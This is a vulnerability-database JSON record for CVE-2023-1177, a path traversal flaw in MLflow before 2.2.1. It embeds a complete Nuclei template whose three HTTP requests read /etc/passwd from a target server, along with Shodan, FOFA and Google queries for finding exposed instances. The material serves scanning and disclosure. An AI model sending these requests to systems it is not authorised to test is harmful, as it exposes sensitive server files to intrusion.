{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-1177/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-1177/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-1177/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-1177/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-1177/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-1177"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-1177"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-1177.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2023-1177\n\ninfo:\n  name: Mlflow <2.2.1 - Local File Inclusion\n  author: iamnoooob,pdresearch\n  severity: critical\n  description: |\n    Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Successful exploitation could allow an attacker to read sensitive files on the server.\n  remediation: |\n    Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability.\n  reference:\n    - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/\n    - https://github.com/mlflow/mlflow/commit/7162a50c654792c21f3e4a160eb1a0e6a34f6e6e\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1177\n    - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-1177\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-1177\n    cwe-id: CWE-29,CWE-22\n    epss-score: 0.6968\n    epss-percentile: 0.99346\n    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: lfprojects\n    product: mlflow\n    shodan-query: http.title:\"mlflow\"\n    fofa-query:\n      - title=\"mlflow\"\n      - app=\"mlflow\"\n    google-query: intitle:\"mlflow\"\n  tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json; charset=utf-8\n\n        {\"name\":\"{{randstr}}\"}\n      - |\n        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json; charset=utf-8\n\n        {\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n      - |\n        GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: version\n        group: 1\n        regex:\n          - '\"version\": \"([0-9.]+)\",'\n        internal: true\n        part: body\n# digest: 4a0a00473045022003e2648934334dccb46e10de10f54fc592ea58d6eca00eb953ab62473ff42983022100d5b0529cc1e6e6abe37656cd9d2a20c14f01a75581a9586fd61858e16b64ea9d:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-1177"
}